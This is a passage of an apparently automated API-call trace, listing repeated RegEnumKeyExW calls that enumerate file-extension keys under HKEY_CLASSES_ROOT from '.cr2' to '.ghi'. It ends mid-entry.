[0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x57, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cr2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x58, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".crl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x59, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".crt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x5a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".crtx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x5b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".crw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x5c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cs", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x5d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".csa", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x5e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".csproj", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x5f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".css", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x60, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".csv", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x61, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cur", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x62, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cxx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x63, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dat", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x64, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".db", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x65, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dbg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x66, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dbs", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x67, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dct", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x68, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dctx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x69, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dctxc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x6a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dds", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x6b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".def", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x6c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".der", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x6d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".desklink", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x6e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".deskthemepack", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x6f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".det", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x70, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".diagcab", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x71, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".diagcfg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x72, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".diagpkg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x73, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dib", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x74, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dic", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x75, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".divx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x76, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".diz", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x77, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dll", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x78, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dl_", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.583] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x79, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dng", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x7a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".doc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x7b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dochtml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x7c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".docm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x7d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".docmhtml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x7e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".docx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x7f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".docxml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x80, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dos", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x81, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dot", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x82, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dothtml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x83, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dotm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x84, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dotx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x85, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dqy", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x86, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".drv", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x87, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dsn", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x88, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dsp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x89, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dsw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x8a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dtcp-ip", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x8b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dvr-ms", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x8c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".dwfx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.584] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x8d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".easmx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x8e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ec3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x8f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".edrwx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x90, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".elm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x91, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".emf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x92, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".eml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x93, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".eprtx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x94, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".eps", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x95, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".epub", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x96, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".erf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x97, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".etp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x98, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".evt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x99, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".evtx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x9a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".exc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x9b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".exe", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x9c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".exp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x9d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ext", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x9e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ex_", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.585] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x9f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".eyb", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".faq", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".fdf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".fdm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".fif", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".fky", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".flac", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".flv", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".fnd", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".fnt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".fon", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xaa, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".gcsx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xab, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ghi", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: 